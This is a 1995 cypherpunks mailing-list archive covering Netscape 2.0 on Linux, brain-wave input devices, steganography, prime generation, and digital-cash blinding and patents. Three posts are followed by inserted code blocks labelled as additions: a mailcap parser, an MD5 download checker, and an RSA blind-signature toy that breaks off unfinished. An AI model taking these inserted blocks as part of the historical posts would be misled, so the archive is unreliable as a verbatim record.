From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sun, 8 Oct 95 13:22:12 PDT
To: cypherpunks@toad.com
Subject: Re: NSA Realists v. Nuts
Message-ID: <199510082019.QAA15164@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199510071424.AA00279@october.ducktown.org>,
mkj@october.ducktown.org wrote:

> Need I point out that pride in one's work is not necessarily exclusive
> of evil?  Rarely does anyone actually think of themselves as evil --
> and those few who do are usually just harmless nuts.  The most evil
> and destructive people throughout history have always thought of
> themselves as good people, doing good work.

Let me illustrate this with an example. During my visit to Dachau
Concentration Camp, I saw original lab notebooks of experiments designed
to increase the survival rate of pilots downed above the cold waters of the
North Sea. A noble cause.

The notebooks contained pages upon pages of tables listing survival times
vs. water temperature, the data gained by dropping subjects into a tub
containing water of a defined temperature.

I then saw more tables of the effects of various methods investigated to
revive hypothermia victims who were near death. One of the treatments
under investigation was dropping the patient into boiling water. Surely
this type of research falls under the category of evil.

But the scientists that conducted the study would not have thought so.
They believed that they did a favor to humanity. The fact that to this day
the treatment of hypothermia is based upon the results of this study,
saving the lives of thousands of patients over the decades past, would
surely - in the experimenters' minds - have vindicated their gruesome
deeds.

Ponder this,
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMHgyXyoZzwIn1bdtAQFZCAGAvCKsAfc09eefeVsp3Oec73L6WsvxJcbH
nlyp7+gX0rG1vBZcsTemp817MSa/WUbb
=UuOA
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Christopher J. Shaulis" <cjs@netcom.com>
Date: Sun, 8 Oct 95 14:34:18 PDT
To: rjc@clark.net (Ray Cromwell)
Subject: Re: [NOISE] Caution! Netscape 2.0 and Linux
In-Reply-To: <199510082054.QAA04516@clark.net>
Message-ID: <199510082024.QAA00698@hoopsnake.cjs.net>
MIME-Version: 1.0
Content-Type: text


> > Just a warning to steer clear of Netscape 2.0 on Linux. It can't
> > resolve FQDNs, it's distributed as a statically linked a.out binary
> > *AGAIN*, and I'm hearing lots of reports sitting here on IRC that it
> 
>    It was released as a dynamically linked binary first, however
> gazillions of Linux users who didn't purchase Motif (and hence could not
> run Netscape 2.0 since it uses Motif), complained, and Netscape
> put up a statically linked version immediately.

Releasing an a.out binary without motif statically linked is a dumb
idea. There were approximately a dozen vendors of Motif for Linux,
however none of their libraries were compatible as they could not
agree on where the library should reside in memory and how much space
to allocate for future additions to the libraries.

That's why the linux developers switched to ELF format binaries. Under
ELF all symbol names are resolved at run-time so one man's motif will
work just fine for everyone elf. 

Normally I would suggest that someone should drop the good people at
netscape a hint that you can link Motif statically without linking all
of the X11 libraries statically as well, except they are still producing
a.out bins and since nobody has a.out libraries any more, making one
dynamically linked wouldn't do anyone any good.

> > that there is no java support yet for Linux, and the Java support in
> > the Sun/Windows version of netscape is based on the new (and
> > incompatible with earlier versions) beta version of Java which sun
> > pimped out to Netscape and won't release the source code to.
> 
>    No, the Java in Netscape 2.0 is Java BETA. The Java used in
> earlier versions was Java Alpha, and Sun explicitly said that
> the class hierarchy *would* change. The Java used in Netscape 2.0
> is the same Java you get in SunSoft's Java development environment.

I said it first, but you said it better. Netscape uses the Beta Java
stuff, which is totally incompatible with the Alpha Java stuff. Nobody
has the Beta java stuff except for Netscape because sun is refusing to
release it to anyone else for the moment -- that means you can't get
it at sun's site.

Christopher




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Raph Levien <raph@cs.berkeley.edu>
Date: Sun, 8 Oct 95 16:37:51 PDT
To: cypherpunks@toad.com
Subject: Re: Netscape 2.0 beta
Message-ID: <307860AB.167E@cs.berkeley.edu>
MIME-Version: 1.0
Content-Type: text/plain


I just got Netscape 2.0 beta for DEC Alpha. Here are my initial
impressions:

* Still no Java support (for DEC Alpha) :-(.

* I saw no hints of S/MIME support. Did I miss something? Do the
  binaries for other platforms support S/MIME? I have access to HP, 
  and will probably demand a Sun account from the powers that be
  here, just so I can run Java. I _really_ want to test S/MIME.

* The mail reader facility looks pretty good. The smooth
  integration of MIME and HTML objects is really quite nice. On
  the other hand, there are a few UI quirks that will no doubt
  get ironed out over the coming months.

* The .mailcap parser _still_ doesn't recognize %{variable} style
  entries. Thus, I wasn't able to test Michael Elkins' PGP/MIME
  format for compatibility with Netscape. The %{} syntax is in
  the spec (RFC 1524), guys.

* To send mail, Netscape apparently connects to the SMTP server
  running on localhost. I haven't confirmed this. Thus, I don't
  see any way to integrate Netscape and premail :-(. Guess I'll
  just have to wait for Netscape script (from what I've seen so
  far, it's not possible in pure Java).

* No user-defined headers from mail :-(. Thus, I couldn't put an
  "In-Reply-To: " header in this followup.

* News is also not bad, but I find I can't zip through tons of
  low S/N newsgroups the way I can with trn. I tend to rate
  newsreaders in number of messages deleted per second. I think
  with a bit more tweaking on the UI, it could really sing.

* One slick feature of news is its ability to decode binary
  postings, apparently in both MIME and uuencode formats. However,
  I wasn't able to figure out how to decode multiparts.

* The UI render code has a number of cosmetic defects (possibly
  related to the DECness of my machine). One new one is that
  drag-and-drops leave the Bookmarks window in an inconsistent
  state, leading one to want to press ctrl-L :-).

   Overall, nicely done. Mozilla will clearly remain the standard
in Web browsers, for the next few months anyway.

Raph
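
The %{variable} substitution that the message says Netscape's .mailcap parser
skips, as an added example (not part of the original post and not Netscape's
code). The sample mailcap and the helper name "pgpmime-verify" are constructed
for illustration; each substituted value is shell-quoted because Content-Type
parameters come from the sender of the message.

```python
import re
import shlex

# Constructed sample mailcap. "pgpmime-verify" is a hypothetical helper name.
SAMPLE_MAILCAP = """\
# viewer entries
text/*; more %s
multipart/signed; pgpmime-verify %s %{protocol} %{micalg}; \\
    description=PGP/MIME signed message
"""

# One token of a mailcap command: a backslash-quoted character, %s, %t,
# or a named Content-Type parameter written %{name}.
_TOKEN = re.compile(r"\\(.)|%([st])|%\{([^}]+)\}")


def parse_entry(line):
    """Split one mailcap line into (content_type, command, fields)."""
    # ';' separates fields unless it is quoted as '\;'.
    parts = [p.strip() for p in re.split(r"(?<!\\);", line.strip())]
    if len(parts) < 2 or not parts[0] or not parts[1]:
        raise ValueError("not a mailcap entry: %r" % line)
    mtype = parts[0].lower()
    if "/" not in mtype:              # a bare type means type/*
        mtype += "/*"
    fields = {}
    for extra in parts[2:]:
        if extra:
            name, _, value = extra.partition("=")
            fields[name.strip().lower()] = value.strip()
    return mtype, parts[1], fields


def find_entry(mailcap_text, content_type):
    """Return the first entry matching content_type, honouring 'type/*'."""
    wanted = content_type.lower()
    text = mailcap_text.replace("\\\n", "")   # join continuation lines
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith("#"):
            continue
        mtype, command, fields = parse_entry(line)
        if mtype == wanted or (mtype.endswith("/*")
                               and wanted.startswith(mtype[:-1])):
            return mtype, command, fields
    return None


def expand(command, filename, content_type, params):
    """Build the shell command line for one body part.

    Every substituted value is quoted so that it stays a single shell word,
    whatever characters the sender put into the Content-Type parameters.
    Assumes the template does not wrap its placeholders in quotes of its own.
    """
    params = {k.lower(): v for k, v in params.items()}

    def substitute(match):
        quoted_char, s_or_t, name = match.groups()
        if quoted_char is not None:
            return quoted_char                     # '\x' stands for 'x'
        if s_or_t == "s":
            return shlex.quote(filename)
        if s_or_t == "t":
            return shlex.quote(content_type)
        return shlex.quote(params.get(name.lower(), ""))

    return _TOKEN.sub(substitute, command)


if __name__ == "__main__":
    _, cmd, _ = find_entry(SAMPLE_MAILCAP, "multipart/signed")
    print(expand(cmd, "/tmp/part.1", "multipart/signed",
                 {"protocol": "application/pgp-signature",
                  "micalg": "pgp-md5"}))
```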




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Sun, 8 Oct 95 13:48:14 PDT
To: cypherpunks@toad.com
Subject: Re: Noise: anyone experience with brain waves input devices (IBVA,...)
Message-ID: <199510082046.QAA15225@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <9510080007.AA01951@hplyot.obspm.fr>, dl@hplyot.obspm.fr
(Laurent Demailly) wrote:

> I'd like to know if anyone has first hand experience with brain wave
> and other (hyped) input devices like IBVA or others and/or pointers to
> information ?

The pioneering work in this field was done by Andrew Junker, formerly Air
Force labs. He now uses his system to sail his boat. At Rand Mac Millan
Air Force Base, they have a simulator that is controlled by brain waves
alone. 
Note that all the brain wave interfaces only allow a simple left/right
type of control. Right turn is easy, but left turn is rather hard to
learn. Anything beyond that, as well as direct input of data into the
brain requires a direct link to neurons that can only be achieved by
surgical means. 

See Brindley G S et al and the work done by Normann R A at U of Utah for
the studies that defined the field. I have developed a design that solves
the notorious problem of connecting the silicon matrix to individual
neurons, but really can't elaborate on it until I get around to filing a
patent for it. Also take a look at the breakthroughs reported in PHYSICS
NEWS UPDATE The American Institute of Physics Bulletin of Physics News
Number 236: August 7, 1995 by Phillip F. Schewe and Ben Stein available at
http://www.hep.net/documents/newsletters/pnu/1995/pnu-236.html

Have fun,
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMHg4gSoZzwIn1bdtAQFpWAF9HQg2f8myEyI4HrHY/5ZCnB/nLG+AzZXo
rA8zMPMo0l5t24i74tlTBJnaZYS4zkSW
=Hq/0
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Cromwell <rjc@clark.net>
Date: Sun, 8 Oct 95 13:55:44 PDT
To: cjs@netcom.com (Christopher J. Shaulis)
Subject: Re: [NOISE] Caution! Netscape 2.0 and Linux
In-Reply-To: <199510081807.OAA00500@hoopsnake.cjs.net>
Message-ID: <199510082054.QAA04516@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


> 
> Hi all.
> 
> Just a warning to steer clear of Netscape 2.0 on Linux. It can't
> resolve FQDNs, it's distributed as a statically linked a.out binary
> *AGAIN*, and I'm hearing lots of reports sitting here on IRC that it

   It was released as a dynamically linked binary first, however
gazillions of Linux users who didn't purchase Motif (and hence could not
run Netscape 2.0 since it uses Motif), complained, and Netscape
put up a statically linked version immediately.

> locks up R6 versions of XFree solid on a random basis. Not to mention
> that there is no Java support yet for Linux, and the Java support in
> the Sun/Windows version of Netscape is based on the new (and
> incompatible with earlier versions) beta version of Java which Sun
> pimped out to Netscape and won't release the source code to.

   No, the Java in Netscape 2.0 is Java BETA. The Java used in
earlier versions was Java Alpha, and Sun explicitly said that
the class hierarchy *would* change. The Java used in Netscape 2.0
is the same Java you get in SunSoft's Java development environment.

-Ray



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jamie Zawinski <jwz@netscape.com>
Date: Sun, 8 Oct 95 17:16:13 PDT
To: cypherpunks@toad.com
Subject: Re: [NOISE] Caution! Netscape 2.0 and Linux
In-Reply-To: <199510082054.QAA04516@clark.net>
Message-ID: <3078691D.50683E45@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


(I have no idea what this has to do with Cypherpunks, but...)

Christopher J. Shaulis wrote:
> 
> Releasing an a.out binary without motif statically linked is a dumb
> idea.

It wasn't a dumb idea, it was a mistake :-)  We didn't intend to do it.

> That's why the linux developers switched to ELF format binaries. Under
> ELF all symbol names are resolved at run-time so one man's motif will
> work just fine for everyone elf.

Even when ELF has taken over the Linux world, we will still be linking
Motif statically because we can't count on everyone having it, and even
if we could, we can't count on everyone having the same version.

And if Motif is static, then the other X libs have to be static, because
all versions of Motif won't interoperate with all versions of Xlib and
Xt.  (In particular, Motif 1.2.4 and X11R6 don't get along.)

> Normally I would suggest that someone should drop the good people at
> netscape a hint that you can link Motif staticly without linking all
> of the X11 libraries staticly as well, except they are still producing
> a.out bins and since nobody has a.out libraries any more, making one
> dynamicly linked wouldn't do anyone any good.

If you can prove that "nobody has a.out libraries any more," we will
stop distributing a.out binaries and start distributing ELF binaries.
But we don't have the resources to build and test two Linux binaries,
especially given that we don't sell the Linux version.  So, given that
we're only building one binary, my belief is that everyone will be
able to run an a.out binary, and a much smaller number of people
will be able to run an ELF binary.  If you have numbers, I'd be happy 
to be proven wrong.

-- 
Jamie Zawinski    jwz@netscape.com   http://www.netscape.com/people/jwz/
``A signature isn't a return address, it is the ASCII equivalent of a
  black velvet clown painting; it's a rectangle of carets surrounding
  a quote from a literary giant of weeniedom like Heinlein or Dr. Who.''
                                                         -- Chris Maeda




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Laurent Demailly <dl@hplyot.obspm.fr>
Date: Sun, 8 Oct 95 09:17:42 PDT
To: Ray Cromwell <rjc@clark.net>
Subject: Re: Netscape 2.0 beta
In-Reply-To: <199510080851.EAA13995@clark.net>
Message-ID: <9510081616.AA03926@hplyot.obspm.fr>
MIME-Version: 1.0
Content-Type: text/plain



The shipped beta1 does not work on hpux8.07 (don't bother the looooong
download if you have that OS version) because of libc version.
(yes I know 8.07 is old when latest hp is 10 but 8.07 is also
 stable and I haven't yet found the time to lose for a major upgrade
 (and there are probably a lot of hpux8 sites around))

ps1: are the md5sums coming ?
ps2: it would be nice that ftp site implements an "SITE md5 <file>"
command, so you'd just get the sums from ftp.netscape.com and fetch
the files from mirror and check...
(the pgp signed md5sums posted on newsgroup, mailing list, ftp and web
is even better)

dl
--
Laurent Demailly * http://hplyot.obspm.fr/~dl/ * Linux|PGP|Gnu|Tcl|...  Freedom
Prime#1: cent cinq mille cent cinq milliards cent cinq mille cent soixante sept

Clinton Saddam Hussein munitions SEAL Team 6 colonel cracking nuclear
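
The check proposed in ps2 (sums from the origin site, files from a mirror), as
an added example that is not part of the original post. It assumes the
manifest text has already been authenticated, for instance by checking the PGP
signature the message prefers; file names and contents are constructed. MD5 is
used because the message names it, and the digest length selects the
algorithm, so a SHA-256 manifest is checked the same way.

```python
import hashlib
import hmac
import os
import tempfile

# Hex digest length -> hashlib algorithm name.
ALGORITHMS = {32: "md5", 40: "sha1", 64: "sha256"}


def parse_manifest(text):
    """Parse md5sum-style lines ('<hex>  <name>') into {name: hex}."""
    sums = {}
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        digest, _, rest = line.partition(" ")
        # The second separator is ' ' (text mode) or '*' (binary mode).
        name = rest[1:] if rest[:1] in (" ", "*") else rest
        digest = digest.lower()
        if len(digest) not in ALGORITHMS or set(digest) - set("0123456789abcdef"):
            raise ValueError("line %d: not a hex digest" % lineno)
        # A manifest entry must never point outside the download directory.
        if not name or name in (".", "..") or os.path.basename(name) != name:
            raise ValueError("line %d: unsafe file name %r" % (lineno, name))
        sums[name] = digest
    return sums


def file_digest(path, algorithm):
    """Hash a file in chunks so large downloads need not fit in memory."""
    h = hashlib.new(algorithm)
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def check_downloads(manifest_text, directory):
    """Compare files fetched from a mirror against the origin's manifest."""
    report = {}
    for name, expected in parse_manifest(manifest_text).items():
        path = os.path.join(directory, name)
        if not os.path.isfile(path):
            report[name] = "missing"
            continue
        actual = file_digest(path, ALGORITHMS[len(expected)])
        same = hmac.compare_digest(actual, expected)
        report[name] = "ok" if same else "MISMATCH"
    # Files the mirror carries but the origin never listed are flagged too.
    for name in sorted(os.listdir(directory)):
        report.setdefault(name, "unlisted")
    return report


def demo():
    """Constructed scenario: one intact file, one altered on the mirror,
    one the mirror lacks, and one the manifest does not mention."""
    good = b"constructed release archive\n"
    manifest = "\n".join([
        "# constructed manifest, as the origin site would publish it",
        "%s  example-beta1.tar.Z" % hashlib.md5(good).hexdigest(),
        "%s *README" % hashlib.md5(b"read me\n").hexdigest(),
        "%s  LICENSE" % hashlib.md5(b"license\n").hexdigest(),
    ])
    mirror_files = {
        "example-beta1.tar.Z": good,
        "README": b"read me, altered\n",
        "extra.bin": b"not in the manifest\n",
    }
    with tempfile.TemporaryDirectory() as mirror:
        for name, data in mirror_files.items():
            with open(os.path.join(mirror, name), "wb") as f:
                f.write(data)
        return check_downloads(manifest, mirror)


if __name__ == "__main__":
    for name, status in sorted(demo().items()):
        print("%-22s %s" % (name, status))
```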




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Sun, 8 Oct 95 17:32:45 PDT
To: danisch@ira.uka.de
Subject: Re: Graphic encryption
Message-ID: <9510090028.AA02204@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


> From: Andrew Loewenstern <andrew_loewenstern@il.us.swissbank.com>
> 
> >  Is there anything particular in graphic encryption? I usually
> >  encrypt graphics and document images as regular files with regular
> >  encryption...
> 
> I believe graphic encryption outputs a valid image file that is apparently  
> white noise until you perform the decryption transformation on it.  An  
> obvious way to do this with a non-lossy file format is to encrypt pixel values  
> with a stream cipher.  Another way to make the image unviewable would be to  
> shuffle the pixels or rasters with a PRNG.
> 

I thought it was the ideas presented in Dr Dobbs last year of encoding other
information in a graphic image so that the image still looked the same, but
the other information could be extracted...i.e. using the image as a covert
channel.  Does anyone know what they're really talking about?

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: patrick@Verity.COM (Patrick Horgan)
Date: Sun, 8 Oct 95 17:34:48 PDT
To: sjb@universe.digex.net
Subject: Re: subjective names and MITM
Message-ID: <9510090031.AA02210@cantina.verity.com>
MIME-Version: 1.0
Content-Type: text/plain


> From: Scott Brickner <sjb@universe.digex.net>
> 
> Patrick Horgan writes:
> >Given the difficulty of finding primes, how likely do you think it is that
> >given one of the well known methods and finding the first 1024 bit prime
> >that pops out would give you an effective attack?
> 
> I'm not an expert here, but I understand the "well-known methods" to
> essentially use some formula that "tends" to generate prime numbers from
> uniformly distributed numbers, feed it a "good" random number, and then
> check to see if it's really prime.  If it's not, pick another "good"
> random number and try again.  The entropy in the prime is the same
> as in the random number generator.
> 

Can someone give me pointers to literature on this?  Books preferred.

Patrick
   _______________________________________________________________________
  /  These opinions are mine, and not Verity's (except by coincidence;).  \
 |                                                       (\                |
 |  Patrick J. Horgan         Verity Inc.                 \\    Have       |
 |  patrick@verity.com        1550 Plymouth Street         \\  _ Sword     | 
 |  Phone : (415)960-7600     Mountain View                 \\/    Will    | 
 |  FAX   : (415)960-7750     California 94303             _/\\     Travel | 
  \___________________________________________________________\)__________/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: cman@communities.com (Douglas Barnes)
Date: Sun, 8 Oct 95 17:52:22 PDT
To: cypherpunks@toad.com
Subject: Re: cypherpunks digicash bank?
Message-ID: <v02120d02ac9e26d1b4f9@[199.2.22.120]>
MIME-Version: 1.0
Content-Type: text/plain


>Douglas Barnes <cman@communities.com> writes on cypherpunks:
>> I'm afraid you may have somewhat misunderstood the motivation behind
>> the Identity Agnostic paper. In no way is it intended as a way of
>> not facing the music wrt regulators in the country(s) where such an
>> institution has offices. The IA approach is intended as a possible
>> alternative for an institution that might otherwise license from
>> Chaum.
>
>So it's intended for avoiding patent issues only?

Yes, and not really so much because of price. I'm not the only person
who has found David hard to work with -- he has apparently decided to only
license "respectable" organizations that will not, in his eyes, make his
technology look "bad". I can tell you from painful, expensive experience
that a band of cypherpunks does not qualify as "respectable" in his eyes.
Alas for David, his technology is fundamentally cypherpunk -- there
is little motivation for a "respectable" institution to be the first
penguin on this stuff.

So, if you're a bank, licensing from David is cheap and relatively
painless, but there are powerful disincentives to deployment. Also,
assessing demand is problematic. For a small cypherpunk startup, the
demand is obvious, there are powerful incentives, but the cost of
licensing and David's reluctance to license a slightly wild-eyed
startup act as a barrier. There is certainly a middle ground, but
nobody seems to be stepping forward.

My understanding was that we were exploring the idea of a much smaller,
non-bank organization going into the digital cash business. Note that
while this is theoretically interesting to me, the fact that I'm talking
openly about this stuff is largely due to my decision _not_ to get
personally involved in this kind of venture except as a sidelines
cheerleader, or as an absolute last resort if nobody deploys.

Given that we're talking about a small, cypherpunk-motivated NBFI, I
think the IA stuff will work fine. It should be presented to the
regulators as if it were a fully-blinded system, since there won't
be any guarantee that blinding isn't occurring.

You raise the issue of using software not supplied by the "bank" --
if we're talking about a c'punks project, I'd assume you'd make the
full source code of the system available. The change of a client
from non-blinding to blinding would be about two lines of code.

You've also discussed the issue of commercial uptake -- as I see
it, one of the primary goals of a project like this would be to
provide incentive to deploy to the allegedly numerous Chaum licensees
that have not implemented a damned thing so far. And, with a nice
interface -- or at least the sort of generic GUI interface you can
get with Java -- it might do surprisingly well on its own merits.
Realistically, as soon as someone large comes along, you're likely
to get squashed. But it would be an interesting ride, and you might
just end up getting bought out instead of squashed.

As for a limit on transaction size, my understanding is that Mondex
is using $300 initially as a transaction limit. This certainly seems
reasonable, and it skates in underneath a lot of magic numbers.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Clifford Neuman <bcn@ISI.EDU>
Date: Sun, 8 Oct 95 18:12:38 PDT
To: Cypherpunks <cypherpunks@toad.com>
Subject: anonymous cash without blinding
Message-ID: <199510090112.AA17509@darkstar.isi.edu>
MIME-Version: 1.0
Content-Type: text/plain


   Date: Sun, 8 Oct 1995 14:20:27 -0700 (PDT)
   From: Wei Dai <weidai@eskimo.com>

   Now if the bank allows this exchange of old coins for new coins to be
   done over an anonymous network (e.g., a remailer-net), then the system is
   anonymous as long as you don't move physical money in or out of the system.
   Maintaining anonymity when moving physical money in and out of the system is
   what blinding helps you to do, but this will be less useful in a fully
   digital economy where such movement will be infrequent.
 
See:
 
  Gennady Medvinsky and B. Clifford Neuman.  NetCash: A design for
  practical electronic currency on the Internet.  In Proceedings
  of the 1st ACM Conference on Computer and Communication Security
  November 1993. 

For a discussion of the tradeoffs for this weaker form of anonymity.
You can find postscript for this paper as:
  ftp://prospero.isi.edu/pub/papers/security/netcash-cccs93.ps





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Sun, 8 Oct 95 10:20:16 PDT
To: cypherpunks@toad.com
Subject: Nat Sec Eco Espo
Message-ID: <199510081720.SAA09282@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain



The anonymous post of the White House's National Security
Science and Technology Strategy recalls debate on this policy
underlying reports on CIA economic espionage:


Clinton instructs CIA to focus on trade espionage - report


Los Angeles, Jul 23 (Reuter) - President Clinton has ordered
the Central Intelligence Agency to make economic espionage a
top priority, according to a report in the Los Angeles Times
on Sunday.

The report quotes American intelligence sources who say the
CIA was instrumental in providing U.S. trade negotiators
information during heated auto trade talks with Japan this
spring, and has helped uncover bribes by rival nations
competing with U.S. firms for government contracts.

The sources say Clinton has issued a classified set of
intelligence priorities for the post Cold-War era, and that
the CIA is providing case officers with new training on
economic matters to meet the new challenge.

The recent trade talks with Japan were viewed as a success of
the new policy, according to the Times report. It said U.S.
Trade Representative Mickey Kantor was pleased with the CIA's
ability to report on the bargaining positions of American
rivals.

But the agency has reportedly been less willing to spy on
individual companies. In one recent success in that area the
CIA discovered that the French were offering bribes to
Brazilian officials to help telecommunications giant Thompson
win a government contract. The report says intelligence
information helped U.S.-based Raytheon Co. elbow out Thompson
of France to win the work.

But the problem in such work, say intelligence sources, is
determining which multinational corporations based in the
United States should be considered "American" firms deserving
assistance. Because of this confusion, CIA officials argue
they should be kept out of spy work targeting individual
foreign business at the behest of U.S. corporations.

Even so, the Times report says the intelligence community has
told Congress it can claim credit for uncovering bribes
affecting $30 billion in foreign contracts over the past few
years.

-----












From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: aba@dcs.exeter.ac.uk
Date: Sun, 8 Oct 95 10:22:42 PDT
To: cman@communities.com
Subject: Re: cypherpunks digicash bank?
Message-ID: <18185.9510081722@exe.dcs.exeter.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain



Douglas Barnes <cman@communities.com> writes on cypherpunks:
> I'm afraid you may have somewhat misunderstood the motivation behind
> the Identity Agnostic paper. In no way is it intended as a way of
> not facing the music wrt regulators in the country(s) where such an
> institution has offices. The IA approach is intended as a possible
> alternative for an institution that might otherwise license from
> Chaum.

So it's intended for avoiding patent issues only?

But the identity agnostic idea, and the idea of using software not
officially supplied by the bank does not sound like something that
would be easy to convince a bank, or other financial institution of?

I mean the agnostic server idea is that the user must obtain patent
infringing software in order to gain anonymity, or else the user
individually obtain on a case by case basis a license from Chaum.  A
similar mess to the early problem with PGP, back in the days when RSA
contended that PGP was a patent infringement, and the other side of
the story was that it was the user's responsibility to get a license
from RSA.

As early versions of PGP demonstrated individuals can get away with
this kind of thing, but it doesn't help commercial uptake of the
software.  You need commercial uptake, as a lot of the shops will be
commercial service providers, plus value added information or product
providers.  What I'm saying is that whilst technically the server need
do nothing infringing, without the infringing client software it
provides nothing new over existing systems, and that the stigma of
illegality, might adversely affect the acceptability of the whole
scheme to a bank.

Ie if you really wanted to sell the system to a bank, you'd presumably
stand a better chance if you removed the potential for blinded
signatures altogether.

Tim is right, patents most definitely retard advancement of technology.

> The regulators I've discussed this with are primarily concerned with
> how money moves into and out of a digital cash system. The fact that
> small payments cannot be traced from buyer to seller is not at the
> top of their list of concerns -- it's already a basic fact of life
> for them in existing payment systems. 

So you think with the $10k limit, they might even be happy with a
system such as I just described?  (note: I did not imply anonymous
accounts, only payer anonymity, basically exactly what Chaum has in
his trial system right now).

> They are also not oblivious to the privacy concerns inherent in an
> institution logging massive amounts of counterparty data about
> small transactions.

I had not realised they were concerned over such things.  How does
this fit in with the separate 100$ bill for domestic and foreign use?
It was previously my suspicion, that 100$ bills were first, and that
soon they would be trying to outlaw cash altogether!

Perhaps I am too cynical, and I am glad to hear it.

(Anyone know if anything ever came of this creation of a foreign issue
of 100$ bills which had to be exchanged at customs in entry and exit,
each being legal tender only when used in the correct jurisdiction?)

> I would strongly discourage anyone from trying to set up a garage-
> type operation. While regulators clearly don't appreciate the
> subtleties of this stuff, they can spot an illegal bank or an
> unlicensed money transmitter from a mile away.

I was talking of doing it by the book, patent licenses, appropriate
banking licenses, banking regulatory approval.  Your description of
the banking regulatory bodies' likely stance on transferring small
amounts anonymously was more favourable than I envisaged.

The garage-type operation: I was having problems convincing myself
that any bank could be persuaded to do it.  Hence I thought, well the
civilian sector would have to do it.  It doesn't have to be
amateurish, just has to be run by people who have an interest in
privacy, cypherpunks aren't excluded from doing things professionally,
and in fact have a vested interest in seeing it succeed even.  You
can't expect big banks, governments or corporate types to deliver
privacy on a plate, it is counter to their interests - they like
nicely indexed, cataloged user profiles, as they are saleable items.
Accurate user demographics is big business.

The closest that I've seen to a bank offering any semblance of
anonymity is Mondex, and it's a crock as far as privacy goes IMO, as
as far as I understand the card knows everything, and there is
*nothing* stopping the bank downloading *all* of that information next
time you plug the card in.  That's the kind of anonymity I was growing
used to seeing banks offer.  Also the fact that it relies purely on
the tamper resistance of the card isn't very inspiring, no
cryptographic protocols, just a counter buried in a tamper proof card.

> If your concern is creating account anonymity, then you're going to
> need to set up outside of the US.

That was not the immediate concern, only payer anonymity.  I thought
this would be too much to expect to get away with.  Your comments
back up that belief.

> Do be aware that even the more relaxed countries of the world have
> regulations that cover this sort of thing, and they are especially
> interested in making sure you at least pay the appropriate licensing
> fees.

Licensing fees for what?  I lack details, and insight into the
background of financial dealings (as you might have noticed:-), but my
outburst was prompted by impatience with the take up of DigiCash, or
any half decent alternative.  Blind signature technology has been
around for a long time now, and there is not one on-line instance of a
practical real world use of this technology.

So what problems remain to be solved with a system which has the
following characteristics:

1) either agnostic (to save $150k + 10% profits) or coughing up the
   $150k for Chaum's patents - I'm not fussy, only concern for me is
   implications on uptake as described above

2) no anonymous accounts

3) payer anonymous

4) on-line, normal banking style records kept of money paid in

5) 100% real currency backed

6) profits by keeping interest on backed currency, possibly small % on
   cashing to pass on VISA costs, etc if necessary


Would US banking regulations in your opinion have a problem with this?

If $150k is the real sticking point then I'm surprised, I mean ok,
it's some money, perhaps the 10% cut of profits Chaum requires is more
of a concern.  But surely this would win as a privacy preserving
internet payment system for convenience, on-line instant payment.

With the kind of money investors seem to be willing to back Netscape
with and the unexpectedly high level of interest in their commerce
servers, even Chaum's $150k seems like small change.  There must be
more to it, what, a $1M lawyer's bill to sort out the technicalities,
and legal implications with regulators?

Adam
--
#!/bin/perl -s-- -export-a-crypto-system-sig -RSA-3-lines-PERL
$m=unpack(H.$w,$m."\0"x$w),$_=`echo "16do$w 2+4Oi0$d*-^1[d2%Sa
2/d0<X+d*La1=z\U$n%0]SX$k"[$m*]\EszlXx++p|dc`,s/^.|\W//g,print
pack('H*',$_)while read(STDIN,$m,($w=2*$d-1+length($n)&~1)/2)
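
The identity-agnostic arrangement discussed in this message and in Douglas
Barnes' reply (his remark that moving a client from non-blinding to blinding
is about two lines of code), as an added example that is not code from either
post or from DigiCash. It uses textbook RSA without padding and a constructed
toy key; the account name and coin serials are made up, and double-spend
checking is left out.

```python
import hashlib
import math
import secrets

# Constructed toy key for the mint: two Mersenne primes, far too small for
# real use and chosen only so the example runs instantly.
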